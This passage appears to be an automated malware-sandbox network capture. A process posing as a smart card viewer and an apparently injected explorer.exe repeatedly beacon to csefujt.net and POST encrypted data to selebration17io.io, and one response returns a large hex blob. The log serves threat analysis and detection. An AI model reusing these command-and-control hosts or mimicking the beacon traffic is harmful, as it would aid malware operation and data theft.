                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                49192.168.2.649787185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.312777996 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.556809902 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                50192.168.2.64978891.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.697498083 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://apflwtmswtngbhc.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 290
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.697544098 CET290OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fc cb 40 c7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO@/^mBq1Gg8[%So3q-2rp-9$UbfVLWv-#w)ySf]akJ>dL1qiEfk56@
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.954190969 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                51192.168.2.649789185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:00.939879894 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:01.182001114 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                52192.168.2.649790185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:01.671211958 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:01.910502911 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                53192.168.2.649792185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.267677069 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.513107061 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                54192.168.2.64979391.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.393600941 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://odpbiknexhwa.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 274
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.393649101 CET274OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 80 d8 3c ac
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO<~6Yq8CdIVLsG.W<O67K :D|5WF/JeYRl'[Z^5v3;w`?$<HS:$k ?}[2omf)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.651201010 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                55192.168.2.649795185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:02.858400106 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.099977970 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 64 34 34 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 66 38 64 63 39 66 35 31 65 31 37 65 61 62 64 35 36 65 62 30 33 63 61 66 38 38 61 65 34 39 65 38 34 34 64 38 30 34 37 64 62 65 31 63 30 33 37 33 66 62 39 34 64 66 36 64 31 64 61 31 62 32 30 65 38 37 64 35 64 61 64 37 35 66 64 36 65 61 64 32 64 35 37 63 36 65 30 64 31 30 61 63 38 35 64 63 62 37 61 62 61 31 35 66 66 33 33 38 31 32 66 65 31 30 65 61 34 36 37 63 31 34 64 62 65 65 30 35 30 65 63 35 66 37 39 34 39 65 66 32 34 36 37 39 65 33 61 36 65 38 64 65 31 31 33 63 34 65 63 38 62 39 62 33 63 63 65 37 31 39 37 31 65 64 63 35 61 38 65 32 61 62 36 35 32 62 31 65 38 35 38 33 66 65 66 37 38 63 63 66 63 36 37 62 62 38 66 65 38 64 66 34 39 65 36 33 65 63 32 31 37 33 64 35 38 34 34 32 31 65 31 32 33 36 63 30 30 36 36 61 37 65 65 38 39 66 64 38 63 32 65 35 31 65 36 35 37 37 61 32 39 66 62 33 34 35 63 66 34 66 65 66 39 38 64 66 64 33 39 36 35 61 35 65 66 34 64 39 33 38 34 66 62 37 61 32 63 31 61 62 39 37 36 65 64 39 63 63 62 61 63 36 34 64 36 36 64 31 62 32 61 33 34 36 31 61 36 35 34 63 65 64 64 61 36 33 38 32 66 62 38 64 37 30 66 62 65 30 31 61 37 61 30 33 62 61 36 63 34 63 33 33 61 37 35 32 61 30 65 64 33 33 62 65 32 31 37 66 30 64 37 62 64 31 39 34 61 64 36 32 31 31 61 63 36 35 66 64 38 66 33 36 33 39 36 32 34 62 32 38 38 35 63 61 33 65 35 63 65 61 63 63 36 32 35 32 32 62 66 37 65 62 37 65 63 30 61 39 62 61 30 62 37 37 61 35 66 62 65 38 31 66 31 33 66 61 63 66 65 38 32 39 38 31 65 65 39 31 34 65 38 35 39 38 30 34 63 36 37 63 62 62 33 64 66 66 66 64 61 35 34 36 36 61 37 39 38 66 30 33 38 61 63 37 32 38 33 30 63 33 37 61 62 32 39 64 30 33 31 63 33 39 65 30 32 64 35 35 35 62 35 32 66 30 36 31 64 35 36 63 30 64 36 36 65 35 63 33 62 35 39 36 34 38 35 66 35 39 30 32 38 32 39 36 32 35 31 31 31 63 61 64 63 62 30 31 30 31 36 66 37 64 35 62 38 65 39 64 36 33 63 37 36 36 35 65 36 33 66 38 30 64 63 30 37 30 61 34 39 38 33 61 38 63 30 30 33 34 36 34 36 64 34 37 64 37 35 35 31 33 37 34 65 66 64 64 39 64 35 64 32 66 31 63 64 34 64 39 65 33 65 36 62 34 34 66 66 37 63 33 34 38 39 32 65 62 33 64 31 39 32 37 66 38 33 34 61 63 32 38 64 33 65 31 38 30 31 36 30 39 64 66 37 39 35 65 64 31 30 31 31 61 37 32 61 38 39 63 36 31 33 37 30 30 33 63 33 33 66 63 61 66 65 39 32 30 38 37 36 33 65 37 30 39 39 33 37 31 63 65 63 35 66 34 34 36 30 36 35 38 36 34 66 63 34 62 39 61 62 65 31 33 65 61 30 64 31 63 32 31 62 35 30 38 63 32 65 64 36 34 33 35 30 38 64 61 63 64 36 36 36 64 32 34 66 33 64 62 31 36 32 65 30 32 64 32 36 62 33 36 66 38 38 35 63 30 33 63 36 61 64 62 61 61 63 36 66 61 36 64 65 30 64 39 33 34 36 64 63 64 63 63 62 34 62 61 64 31 62 62 36 34 61 66 36 62 33 62 33 36 32 38 35 61 66 32 37 61 39 33 31 33 34 30 65 33 64 63 34 38 33 37 38 31 37 65 38 61 34 63 32 35 33 37 30 65 61 32 61 32 36 32 38 31 35 30 36 64 38 32 62 61 30 34 36 61 35 31 66 39 32 34 61 64 34 61 31 64 36 39 32 34 66 66 30 35 66 38 62 38 33 62 32 64 65 32 61 30 37 64 61 32 37 32 34 61 34 38 30 35 35 63 37 35 36 31 39 30 36 34 63 63 63 34 34 31 33 35 39 32 34 34 38 30 37 65 65 39 64 34 63 34 31 61 31 30 66 32 63 63 62 66 61 61 33 30 31 63 61 65 61 37 62 61 66 65 33 65 33 66 63 31 36 32 35 37 30 64 65 30 61 63 36 63 64 31 63 62 38 35 38 66 64 34 66 33 64 37 33 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d4467b69c953804b26b565fe95b321bd19a55ff8dc9f51e17eabd56eb03caf88ae49e844d8047dbe1c0373fb94df6d1da1b20e87d5dad75fd6ead2d57c6e0d10ac85dcb7aba15ff33812fe10ea467c14dbee050ec5f7949ef24679e3a6e8de113c4ec8b9b3cce71971edc5a8e2ab652b1e8583fef78ccfc67bb8fe8df49e63ec2173d584421e1236c0066a7ee89fd8c2e51e6577a29fb345cf4fef98dfd3965a5ef4d9384fb7a2c1ab976ed9ccbac64d66d1b2a3461a654cedda6382fb8d70fbe01a7a03ba6c4c33a752a0ed33be217f0d7bd194ad6211ac65fd8f3639624b2885ca3e5ceacc62522bf7eb7ec0a9ba0b77a5fbe81f13facfe82981ee914e859804c67cbb3dfffda5466a798f038ac72830c37ab29d031c39e02d555b52f061d56c0d66e5c3b596485f5902829625111cadcb01016f7d5b8e9d63c7665e63f80dc070a4983a8c0034646d47d7551374efdd9d5d2f1cd4d9e3e6b44ff7c34892eb3d1927f834ac28d3e1801609df795ed1011a72a89c6137003c33fcafe9208763e7099371cec5f446065864fc4b9abe13ea0d1c21b508c2ed643508dacd666d24f3db162e02d26b36f885c03c6adbaac6fa6de0d9346dcdccb4bad1bb64af6b3b36285af27a931340e3dc4837817e8a4c25370ea2a26281506d82ba046a51f924ad4a1d6924ff05f8b83b2de2a07da2724a48055c75619064ccc441359244807ee9d4c41a10f2ccbfaa301caea7bafe3e3fc162570de0ac6cd1cb858fd4f3d73b
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.100039005 CET1286INData Raw: 37 64 64 35 61 61 35 38 63 31 32 30 62 33 38 66 32 63 63 33 62 63 35 63 62 39 63 63 33 64 39 62 31 36 32 39 34 64 66 33 33 33 36 33 32 30 64 33 39 61 38 37 36 32 39 66 30 62 34 66 64 61 39 61 61 33 37 31 63 64 34 62 64 63 63 39 66 34 38 66 31 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7dd5aa58c120b38f2cc3bc5cb9cc3d9b16294df3336320d39a87629f0b4fda9aa371cd4bdcc9f48f1f1b9453a0abd4c4df2a41f06ab9d4020f9acdac7e5c5a4bcde55a49ddba856c46f154ec27ef6e627f0f13eb2bdc40bf0536f8fdb2cca392b967d5aacf0d7a23af057da8287d502708b637cb31e0ed86fc0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.100085974 CET1027INData Raw: 66 30 30 33 39 64 32 30 66 61 38 30 65 62 31 32 63 38 33 35 61 37 38 34 65 34 39 61 61 31 37 36 35 34 39 36 64 65 61 62 39 33 38 39 39 63 31 35 62 37 35 63 30 65 64 63 35 36 35 32 65 64 35 36 34 64 65 66 37 36 63 39 64 61 35 66 39 65 62 36 62 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f0039d20fa80eb12c835a784e49aa1765496deab93899c15b75c0edc5652ed564def76c9da5f9eb6b60708ad5d208cbdba88aca202150b70fbb951dec68ec4469eab26ab1125d11c9385e4e61111932b8ba04c271200677372531c3321850b2e6ad6a0093ca04fb932b2457c0dd732ea2e37a9ec89b43965df8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.100120068 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                56192.168.2.649797185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.654192924 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.898150921 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                57192.168.2.64979891.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.764831066 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://vjnsqchgwnudstfw.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:03.764831066 CET346OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9a c3 55 cb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOU;r\sEDD+q2^wR|%y}P*x(0at;0qeDnr=;"0KP3]IYgep6:}qvB
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:04.015431881 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                58192.168.2.649799185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:04.254204988 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:04.500132084 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:04 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                59192.168.2.649800185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:04.847948074 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:05.084335089 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:04 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:05.206486940 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:05.451948881 CET220INHTTP/1.1 200 OK
